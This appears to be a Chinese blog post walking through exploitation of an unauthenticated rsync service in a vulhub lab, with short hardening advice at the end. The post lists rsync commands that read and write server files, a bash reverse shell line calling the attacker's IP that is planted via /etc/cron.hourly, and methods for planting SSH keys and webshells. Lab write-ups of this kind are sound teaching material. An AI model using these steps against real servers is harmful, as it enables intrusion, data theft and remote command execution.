linux rsync 漏洞修复,Rsync未授权访问漏洞

最新推荐文章于 2023-10-16 18:15:37 发布
最新推荐文章于 2023-10-16 18:15:37 发布
阅读量424 收藏
点赞数
文章标签: linux rsync 漏洞修复

应用简介

rsync是Linux/Unix下的一个远程数据同步工具,可通过LAN/WAN快速同步多台主机间的文件和目录,默认运行在873端口

漏洞简介

由于配置不当,导致任何人可未授权访问rsync,上传本地文件,下载服务器文件,rsync未授权访问带来的危害主要有两个:一是造成了严重的信息泄露;二是上传脚本后门文件,远程命令执行

测试环境

attacker:kali linux

victim:vulhub里面的rsync

rsync基本命令

列出模块rsync rsync://192.168.1.107:873/

4066545416.png

列出模块src下的文件rsync rsync://192.168.1.107:873/src

1532997408.png

下载文件,比如下载rsync下的配置文件rsyncd.conf另存为本地/root/1.confrsync -av rsync://192.168.1.107:873/src/etc/rsyncd.conf /root/1.conf

1930011420.png

上传文件,比如上传1.conf到/src/etc/upload.txtrsync -av 1.conf rsync://192.168.1.107/src/etc/upload.txt

1211550211.png

常见利用方式

计划任务反弹shell

写好shell,内容为#!/bin/bash

/bin/bash -i >& /dev/tcp/192.168.1.105/4444 0>&1

chmod +x shell赋予可执行权限,然后上传到/etc/cron.hourly

1194608356.png

下载crontab配置文件,查看

1507771164.png

17表示每个小时的第17分钟执行一次,如果觉得要等很久可以上传crontab文件修改17为离自己最近那个时间,然后反弹回shell

3208699745.png

写ssh-keygen公钥然后使用私钥登陆

如果目标机开启了22端口,那么和Redis一样ssh-keygen -t rsa首先在本地生成一对密钥,在.ssh下查看id_rsa.pub,将里面的内容放进.ssh目录下的authorized_keys文件中,记得左右两边的\n防止代码混淆,然后就可以免密登录ssh

往web物理路径写webshell

同样如果有web服务开启写入权限就可以往源码里面写入一句话获取webshell

修复方案

添加一个账号和密码

新建一个文件vim /etc/rsyncd.passwd

按一下格式写入能登陆的用户名和密码username :password

设置允许连入的IP

合理分配权限

数据加密传输

参考链接

weixin_39889337
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux rsync的安装与配置
09-15
rsync是类unix系统下的数据镜像备份工具,从软件的命名上就可以看出来了--remote sync
rsync授权漏洞复现
weixin_45006525的博客
03-31 5699
漏洞简介: rsynclinux系统下的数据镜像备份工具,使用rsync可以快速增量备份数据,支持本地复制,或与其他ssh、rsync主机同步。该协议默认监听873端口,如果目标开启rsync,并且没有配置ACL或访问密码,就可以授权读写目标服务器文件。 环境搭建: 本此环境使用docker-vulhub 进入vulhub-rsync,运行docker-compose up -d 环境搭建完成后,用nmap扫描一下,发现服务已经启动 漏洞复现 1.列出模块下的文件 2.下载任意文件 rsync r
服务安全-应用协议rsync授权&ssh漏洞复现
rumil的博客
10-16 1318
libssh是一个在客户端和服务器端实现SSHv2协议的多平台C库。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配 置ACL或访问密码,我们将可以读写目标服务器文件。OpenSSH 7.7前存在一个用户名枚举漏洞,通过该漏洞,攻击者可以判断某个用户名是否存在于目标主机中。表示在每小时的第17分钟执行run-parts --report /etc/cron.hourly命令。rsyncLinux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。
rsync授权访问漏洞利用复现
技术超强的网络安全平台
05-07 1006
一、Rsync简介RsyncLinux下一款数据备份工具,它在同步文件的同时,可以保持原来文件的权限、时间、软硬链接等附加信息。同时支持通过rsync协议、ssh协议进行远程文件传输。常被用于在内网进行源代码的分发及同步更新,因此使用人群多为开发人员。其中rsync协议默认监听873端口,而一般开发人员安全意识薄弱的情况下,如果目标开启了rsync服务,并且没有配置ACL或访问密码,而rsync默认是root权限,我们将可以读写目标服务器文件。二、利用条件rsync默认允许匿名访问,也可在其配置文件中为同
rsync授权访问漏洞
weixin_44110913的博客
11-07 3432
文章目录 一、漏洞介绍二、漏洞环境三、漏洞利用3.1 漏洞探测3.2 漏洞利用(下载任意文件)3.3 漏洞利用(提权、反弹shell)3.3.1 方法一3.3.2 方法二 四、修复建议 一、漏洞介绍   rsyncLinux下一个远程同步工具,可快速同步多台主机中的文件和目录,如果配置不当,导致任何...
每日漏洞 | rsync授权访问
03-12 3748
每日漏洞 | rsync授权访问
Linux 命令之rsync命令详解
09-15
rsync命令是一个远程数据同步工具,可通过LAN/WAN快速同步多台主机间的文件。下面通过本文给大家分享Linux 命令之rsync命令详解,需要的朋友参考下吧
Linux+双机热备+Rsync
最新发布
04-02
rsync是一款开源,快速,多功能的可实现增量的本地或远程的数据镜像同步备份的优秀工具。适用于多个平台。从软件名称可以看出来是远程同步的意思(remote sync)可实现全量备份与增量备份,因此非常适合用于架构集中...
linux系统下rsync配置
12-13
此文档本人总结了linux下如何配置两台linux系统之间快速传递庞大数据的方法,总结其他很简单,一个看做服务端,一个看做客户端。通过配置rsync即可。前提是要安装rsync的rpm包,运维的小伙伴很实用!
Rsync授权访问 getshell——漏洞复现
W小哥
11-09 3566
一、 Rsync授权访问漏洞介绍 rsyncLinux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。 二、靶场搭建 靶机: ubuntu IP: 192.168.241.142 攻击机: kali IP: 192.168.241.128 直接使用 vluhub 环境了 cd rsync/common docker-compose build docke
漏洞复现-rsync-授权访问】vulfocus/rsync-common
10-16 1127
rsync-授权访问
rsync漏洞复现
B_2013617的博客
02-03 561
vulhub-master rsync漏洞复现 rsync介绍 rsynclinux系统下的数据镜像备份工具。使用快速增量备份工具Remote Sync可以远程同步,支持本地复制,或者与其他SSH、rsync主机同步。rsync默认监听873端口 rsync漏洞点 如果目标开启了rsync服务且配置ACL或者密码,将导致授权访问 1.上传文件、下载服务器文件 2.上传脚本后门文件 3.远程代码执行 进入到docker容器里面,查看rsync的配置文件,可以看到配置文件中没有配置用户名、且定义了
Rsync授权访问漏洞修复
weixin_30399871的博客
03-16 1278
转自:https://www.cnblogs.com/KevinGeorge/p/9648028.html 配置文件/etc/rsync.conf解析: motd file -> motd文件位置 log file -> 日志文件位置 path -> 默认路径位置 use chroot -> 是否限定在该目录下,默认为true,当有软连接时,需要改为fasle,如...
应用协议漏洞-Rsync+协议+漏洞批扫
xiaoheizi的博客
07-12 554
msfconsole是一个强大的接口程序。rsync rsync://123.58.224.8:20700/src/etc/crontab /root/cc.txt 查看crontab中的内容,发现有一个每17分钟执行一次/etc/cron.hourly文件的定时任务。命令:rsync -av shell rsync://123.58.224.8:22700/src/etc/cron.hourly。漏洞存在,可以读取文件:rsync rsync://123.58.224.8:58725/src/tmp/
常见授权访问漏洞修复
qq_41945550的博客
06-02 4409
MongoDB是一个基于分布式文件存储的数据库,由C++语言编写,旨在为WEB应用提供可扩展的高性能数据存储解决方案。MongoDB默认端口为27017。开启MongoDB服务时不添加任何参数时,默认是没有权限验证的,登录的用户可以通过默认端口无需密码对数据库任意操作(增、删、改、查高危动作)而且可以远程访问数据库。
服务攻防-协议漏洞-FTP&RDP&SSH&Rsync&ProFTPD&libssh&Openssh-Hydra工具使用&口令猜解&授权访问
ran的博客
05-09 1962
▶工具下载地址▶工具简介Hydra是一种强大的网络登录破解工具,它可以尝试多种用户名和密码组合来尝试登录网络服务,例如SSH、FTP、Telnet、SMTP、POP3等等。Hydra支持多线程并发登录尝试,并能自动处理输入和输出,使其成为自动化扫描和攻击测试的理想工具。此外,Hydra还支持使用代理服务器、设置超时时间、支持多种协议等高级功能。Hydra通常被用于渗透测试和网络安全评估,以检测目标系统中可能存在的弱点和安全漏洞
linux rsync 漏洞修复,rsync授权访问漏洞利用
weixin_35545345的博客
05-16 384
漏洞描述:rsyncLinux系统下的数据镜像备份工具,使用快速增量备份工具Remote Sync可以远程同步,支持本地复制,或者与其他ssh,rsync主机同步。漏洞利用:它的默认端口号是873,我们可以使用nmap扫描端口看目标IP是否开启了873端口防御方法:配置认证用户或者密码;host allow/deny 来控制接入源IP;uid和gid,使用足够但最小权限的账号进行;必要时候可以配...
linux rsync 漏洞修复,Samba Rsync安全绕过漏洞CVE-2017-17434 3.1.2受影响
weixin_39758618的博客
05-16 237
Samba Rsync 3.1.2爆出安全绕过漏洞,CVEID为CVE-2017-17434,CVSS v3评分9.8,利用难度低。攻击者利用该漏洞可以进行授权的数据泄露,允许授权的修改,以及中断Samba服务。在今年的8月,美奥斯丁市电站数据泄露大量敏感项目资料,就是因为Rsync数据镜像备份工具配置不当Rsync是什么rsynclinux系统下的数据镜像备份工具。使用快速增量备份工具...
rsync 授权访问漏洞
weixin_59086772的博客
12-28 7302
雨笋教育小编来分享干货了,感兴趣的可以一同探讨。 0x00前言 rsyncLinux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。 0x01漏洞原理 rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。 0x02漏洞危害 rsync授权访问会造成严重的信息泄露,攻击者可以上传脚本后门文件,远程命令执行。 0x03环境搭建 docker-compose.yml version: '2' s
rsync 漏洞利用
08-15
- *1* *2* [rsync 授权访问漏洞](https://blog.csdn.net/weixin_59086772/article/details/122195357)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值